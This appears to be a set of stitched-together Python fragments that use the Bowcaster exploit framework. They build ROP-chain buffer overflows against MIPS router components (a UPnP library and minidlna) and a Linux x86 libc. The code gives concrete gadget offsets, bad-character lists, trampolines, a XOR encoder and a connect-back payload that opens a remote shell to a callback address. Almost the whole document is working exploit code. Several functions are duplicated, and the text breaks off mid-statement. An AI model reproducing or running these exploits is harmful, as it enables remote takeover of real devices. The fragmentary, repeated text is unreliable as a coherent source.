libwlbcmshared_base=qemu_libwlbcmshared_base else: libc_base=actual_libc_base libwlbcmshared_base=actual_libwlbcmshared_base SC=SectionCreator(BigEndian,base_address=libc_base,badchars=["\x00"]) ################################################################################ #an address in libwlbcmshared.so #index in +0x50 is a a pointer that points to itself. #That pointer + 0x2c is all NULL bytes and #should cause ssdp_msearch_repsonse() to bail without crashing ################################################################################ section=SC.gadget_section(140, 0x1ECBC, base_address=libwlbcmshared_base, description= "upnp_context placeholder.") ################################################################################ #Epilogue in sub_b100 in libwlbcmshared.so that sets up S1 - S7 ################################################################################ section=SC.gadget_section(136,#offset 0xB1F8, #rop address base_address=libwlbcmshared_base, description="The epilogue of sub_b100 in libwlbcmshared.so. "+\ "Sets up S1-S7.") ################################################################################ # Sets up (readonly) addr in $s0 that can be dereferenced # without crashing the next gadget
from bowcaster.development.overflowbuilder import SectionCreator, OverflowBuffer from bowcaster.common.support import LittleEndian from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload from bowcaster.encoders.mips import MipsXorEncoder sleep_addr = 0x77ef1a40 qemu_libc_base=0x77e3b000 sleep_offset = sleep_addr - qemu_libc_base badchars = ['\n'] SC=SectionCreator(LittleEndian, base_address=qemu_libc_base, badchars=badchars) sections=[] #ROP 1 section = SC.gadget_section(516, 0x193A8, description="load a portion of overflowed stack \ into $ra and $s0-$s5") ## 000193A8 lw $ra, 0x58+var_4($sp) ## 000193AC lw $fp, 0x58+var_8($sp) ## 000193B0 lw $s7, 0x58+var_C($sp) ## 000193B4 lw $s6, 0x58+var_10($sp) ## 000193B8 lw $s5, 0x58+var_14($sp) ## 000193BC lw $s4, 0x58+var_18($sp) ## 000193C0 lw $s3, 0x58+var_1C($sp) ## 000193C4 lw $s2, 0x58+var_20($sp) ## 000193C8 lw $s1, 0x58+var_24($sp) ## 000193CC lw $s0, 0x58+var_28($sp) ## 000193D0 jr $ra ## 000193D4 addiu $sp, 0x58 sections.append(section) #ROP2
def minidlna_rop_gadgets(cls,offset_modifier,qemu=False): libc=0 #libavcodec=0 badbyte_list=['\x00'] for k in cls.minidlna_badbytes.keys(): badbyte_list.append(k) if qemu: libc=cls.libc_qemu #libavcodec=cls.libavcodec_qemu else: libc=cls.libc_actual #libavcodec=cls.libavcodec_actual sc=SectionCreator(cls.endianness,base_address=libc,badchars=badbyte_list) reg_ra=600-offset_modifier reg_s0=564-offset_modifier reg_s1=568-offset_modifier reg_s2=572-offset_modifier reg_s3=576-offset_modifier reg_s4=580-offset_modifier reg_s6=588-offset_modifier gadgets=[] #placeholders one and two get added together and passed as dst into memcpy(). They must add #up to be a writable address." gadget=sc.gadget_section( #752-offset_modifier, 736-offset_modifier, 0x15a3c932, base_address=0, description="placeholder 1 to avoid crashing memcpy.") gadgets.append(gadget) gadget=sc.gadget_section( 752-offset_modifier, 0x15a3c932, base_address=0, description="placeholder 2 to avoid crashing memcpy.") gadgets.append(gadget) #load 1 into $a0, jalr $s3 gadget=sc.gadget_section(reg_ra, 0x00025110, description="reg $ra. set up 3 sec arg to sleep(). jalr $s6.") gadgets.append(gadget) #load stack data into $ra, jr $s1 gadget=sc.gadget_section(reg_s6, 0x0001D95C, description="[reg $s6] setup ra before sleep(). jr $s1") gadgets.append(gadget) #address of sleep gadget=sc.gadget_section(reg_s1, 0x506c0, description="[reg $s1] Address of sleep() in libc. be sure to set up $ra and $a0 before calling.",) gadgets.append(gadget) #[reg $s3] placeholder that allows $s3 to be dereferenced without crashing. gadget=sc.gadget_section(reg_s3, 0x00011918, description="[reg $s3] placeholder that allows $s3 to be dereferenced without crashing.") gadgets.append(gadget) #[reg $ra] offset from $sp into $a2, jalr $s1. gadget=sc.gadget_section(640-offset_modifier, 0x00011918, description="[reg $ra] offset from $sp into $a2, jalr $s1.") gadgets.append(gadget) #move $a2 to $s0, jalr $s4 gadget=sc.gadget_section(632-offset_modifier, 0x0003434C, description="[reg $s0] move $a2 to $s0, jalr $s4") gadgets.append(gadget) gadget=sc.gadget_section(reg_s4, 0x0000BA84, description="[reg $s4] jalr $s0") gadgets.append(gadget) return gadgets
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False): self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier) badbyte_list=['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) if self.qemu: libc=self.libc_qemu else: libc=self.libc_actual offset_modifier=self.offset_modifier reg_ra=600-offset_modifier reg_s0=564-offset_modifier reg_s1=568-offset_modifier reg_s2=572-offset_modifier reg_s3=576-offset_modifier reg_s4=580-offset_modifier reg_s5=584-offset_modifier reg_s6=588-offset_modifier reg_s7=592-offset_modifier #after rop into fn epilogue new_reg_ra=640-offset_modifier new_reg_s0=628-offset_modifier new_reg_s1=632-offset_modifier new_reg_s2=636-offset_modifier SC=SectionCreator(self.endianness,base_address=libc,badchars=badbyte_list) #0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere #in libc's text segment SC.gadget_section(752-offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 1 to avoid crashing memcpy.") SC.gadget_section(768-offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 2 to avoid crashing memcpy.") SC.gadget_section(reg_ra,0x00028028, description="[ra] load 1 into $a0, jalr $s3") SC.gadget_section(reg_s2,0x00028028+0x7E88, description="[s2] readonly placeholder to avoid crashing rop gadget.") SC.gadget_section(reg_s3,0x0001D95C, description="[s3] load stack offset into ra, jalr $s1") SC.gadget_section(reg_s1,0x000506C0, description="[s1] address of sleep") SC.gadget_section(new_reg_ra,0x000427A8, description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6") SC.gadget_section(reg_s6,0x0000BA84, description="[s6] jump into stack via $s0") SC.gadget_section(new_reg_s2,0x00028028, description="[s2] readonly placeholder to avoid crashing stack finder gadget.") trampoline_1=Trampoline(self.endianness,-664) section=SC.string_section(676-offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 664") #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2=Trampoline(self.endianness,1028) section=SC.string_section(16-offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port) if encoder_class: encoded_payload=encoder_class(payload,badchars=badbyte_list) payload=encoded_payload #payload has to go at 1048 since trampoline minimum forward jump is #1028. 1028+trampoline offset+4 = 1048 section=SC.string_section(1048-offset_modifier, payload.shellcode, description="connect-back payload") buf=OverflowBuffer(self.endianness,self.overflow_len,SC.section_list,logger=self.logger) return buf
def minidlna_rop_gadgets(cls, offset_modifier, qemu=False): libc = 0 #libavcodec=0 badbyte_list = ['\x00'] for k in cls.minidlna_badbytes.keys(): badbyte_list.append(k) if qemu: libc = cls.libc_qemu #libavcodec=cls.libavcodec_qemu else: libc = cls.libc_actual #libavcodec=cls.libavcodec_actual sc = SectionCreator(cls.endianness, base_address=libc, badchars=badbyte_list) reg_ra = 600 - offset_modifier reg_s0 = 564 - offset_modifier reg_s1 = 568 - offset_modifier reg_s2 = 572 - offset_modifier reg_s3 = 576 - offset_modifier reg_s4 = 580 - offset_modifier reg_s6 = 588 - offset_modifier gadgets = [] #placeholders one and two get added together and passed as dst into memcpy(). They must add #up to be a writable address." gadget = sc.gadget_section( #752-offset_modifier, 736 - offset_modifier, 0x15a3c932, base_address=0, description="placeholder 1 to avoid crashing memcpy.") gadgets.append(gadget) gadget = sc.gadget_section( 752 - offset_modifier, 0x15a3c932, base_address=0, description="placeholder 2 to avoid crashing memcpy.") gadgets.append(gadget) #load 1 into $a0, jalr $s3 gadget = sc.gadget_section( reg_ra, 0x00025110, description="reg $ra. set up 3 sec arg to sleep(). jalr $s6.") gadgets.append(gadget) #load stack data into $ra, jr $s1 gadget = sc.gadget_section( reg_s6, 0x0001D95C, description="[reg $s6] setup ra before sleep(). jr $s1") gadgets.append(gadget) #address of sleep gadget = sc.gadget_section( reg_s1, 0x506c0, description= "[reg $s1] Address of sleep() in libc. be sure to set up $ra and $a0 before calling.", ) gadgets.append(gadget) #[reg $s3] placeholder that allows $s3 to be dereferenced without crashing. gadget = sc.gadget_section( reg_s3, 0x00011918, description= "[reg $s3] placeholder that allows $s3 to be dereferenced without crashing." ) gadgets.append(gadget) #[reg $ra] offset from $sp into $a2, jalr $s1. gadget = sc.gadget_section( 640 - offset_modifier, 0x00011918, description="[reg $ra] offset from $sp into $a2, jalr $s1.") gadgets.append(gadget) #move $a2 to $s0, jalr $s4 gadget = sc.gadget_section( 632 - offset_modifier, 0x0003434C, description="[reg $s0] move $a2 to $s0, jalr $s4") gadgets.append(gadget) gadget = sc.gadget_section(reg_s4, 0x0000BA84, description="[reg $s4] jalr $s0") gadgets.append(gadget) return gadgets
def build_overflow(self, target_ip_address, encoder_class=None, qemu=False): self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier) badbyte_list = ['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) if self.qemu: libc = self.libc_qemu else: libc = self.libc_actual offset_modifier = self.offset_modifier reg_ra = 600 - offset_modifier reg_s0 = 564 - offset_modifier reg_s1 = 568 - offset_modifier reg_s2 = 572 - offset_modifier reg_s3 = 576 - offset_modifier reg_s4 = 580 - offset_modifier reg_s5 = 584 - offset_modifier reg_s6 = 588 - offset_modifier reg_s7 = 592 - offset_modifier #after rop into fn epilogue new_reg_ra = 640 - offset_modifier new_reg_s0 = 628 - offset_modifier new_reg_s1 = 632 - offset_modifier new_reg_s2 = 636 - offset_modifier SC = SectionCreator(self.endianness, base_address=libc, badchars=badbyte_list) #0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere #in libc's text segment SC.gadget_section( 752 - offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 1 to avoid crashing memcpy.") SC.gadget_section( 768 - offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 2 to avoid crashing memcpy.") SC.gadget_section(reg_ra, 0x00028028, description="[ra] load 1 into $a0, jalr $s3") SC.gadget_section( reg_s2, 0x00028028 + 0x7E88, description= "[s2] readonly placeholder to avoid crashing rop gadget.") SC.gadget_section( reg_s3, 0x0001D95C, description="[s3] load stack offset into ra, jalr $s1") SC.gadget_section(reg_s1, 0x000506C0, description="[s1] address of sleep") SC.gadget_section( new_reg_ra, 0x000427A8, description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6") SC.gadget_section(reg_s6, 0x0000BA84, description="[s6] jump into stack via $s0") SC.gadget_section( new_reg_s2, 0x00028028, description= "[s2] readonly placeholder to avoid crashing stack finder gadget.") trampoline_1 = Trampoline(self.endianness, -664) section = SC.string_section( 676 - offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 664") #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2 = Trampoline(self.endianness, 1028) section = SC.string_section( 16 - offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") payload = ConnectbackPayload(self.callback_ip_address, self.endianness, port=self.port) if encoder_class: encoded_payload = encoder_class(payload, badchars=badbyte_list) payload = encoded_payload #payload has to go at 1048 since trampoline minimum forward jump is #1028. 1028+trampoline offset+4 = 1048 section = SC.string_section(1048 - offset_modifier, payload.shellcode, description="connect-back payload") buf = OverflowBuffer(self.endianness, self.overflow_len, SC.section_list, logger=self.logger) return buf
paddind = input.offset - (sections[index-1].offset + 4) for byte in input.section_string: p_string+="\\x"+binascii.hexlify(byte) if paddind: return "'" + buf.overflow_string[sections[index-1].offset + 4: input.offset] + "' + '" + p_string + "'" return "'" + p_string + "'" libc_base=0xb7e2d000 badchars = ['\n'] SC=SectionCreator(LittleEndian, base_address=libc_base, badchars=badchars) #gadget 1 EIP_pos = 68 gadget_address = 0xf2ad1 section = SC.gadget_section(EIP_pos, gadget_address, description="load a portion of overflowed stack into \ ecx, eax") #0xb7f1fad1 <__fentry__+17>: pop %ecx #0xb7f1fad2 <__fentry__+18>: pop %eax #0xb7f1fad3 <__fentry__+19>: ret sections.append(section) exit_address = 0x00032be0 section = SC.gadget_section(72, exit_address, description="load exit address into ecx") sections.append(section) system_address = 0x0003F060 section = SC.gadget_section(76, system_address, description="load data into eax") sections.append(section) #gadget 2